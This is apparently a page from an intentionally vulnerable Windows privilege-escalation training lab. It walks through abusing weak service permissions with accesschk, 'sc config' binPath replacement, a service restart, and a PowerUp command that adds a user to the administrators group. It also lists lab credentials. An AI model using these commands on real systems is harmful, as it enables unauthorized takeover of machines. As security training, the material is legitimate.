🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login Unquoted Paths AlwaysInstallElevated Weak Service Perms Token Impersonation DLL Hijacking Stored Credentials
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

Weak Service Permissions

PRIVILEGE ESCALATION 
# If a low-priv user can change the binary path of a service that runs as SYSTEM,
# they can replace it with their payload.

# Step 1: Check service permissions with AccessChk
accesschk.exe -ucqv * /accepteula | findstr "RW"
accesschk.exe -ucqv VulnService /accepteula

# If output shows: RW BUILTIN\Users — you can modify it

# Step 2: Change the service binary path to your payload
sc config VulnService binPath= "C:\temp\shell.exe"
sc config VulnService obj= ".\LocalSystem" password= ""

# Step 3: Restart the service
net stop VulnService
net start VulnService
# Payload runs as SYSTEM

# PowerUp alternative:
Get-ModifiableService | Invoke-ServiceAbuse -Command "net localgroup administrators ram /add"

# After adding yourself to administrators:
net localgroup administrators
# Confirms you are now admin